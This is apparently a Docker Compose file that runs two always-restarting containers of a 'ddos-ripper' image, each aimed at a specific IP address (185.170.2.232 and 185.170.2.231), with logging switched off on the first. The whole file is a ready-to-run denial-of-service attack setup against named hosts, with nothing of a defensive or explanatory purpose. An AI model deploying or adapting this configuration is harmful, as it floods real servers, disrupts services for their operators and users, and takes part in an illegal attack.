version: '3'
services:
  ddos-runner-1:
    image: nitupkcuf/ddos-ripper:latest
    restart: always
    command: 185.170.2.232
    logging:
      driver: none
  ddos-runner-2:
    image: nitupkcuf/ddos-ripper:latest
    restart: always
    command: 185.170.2.231
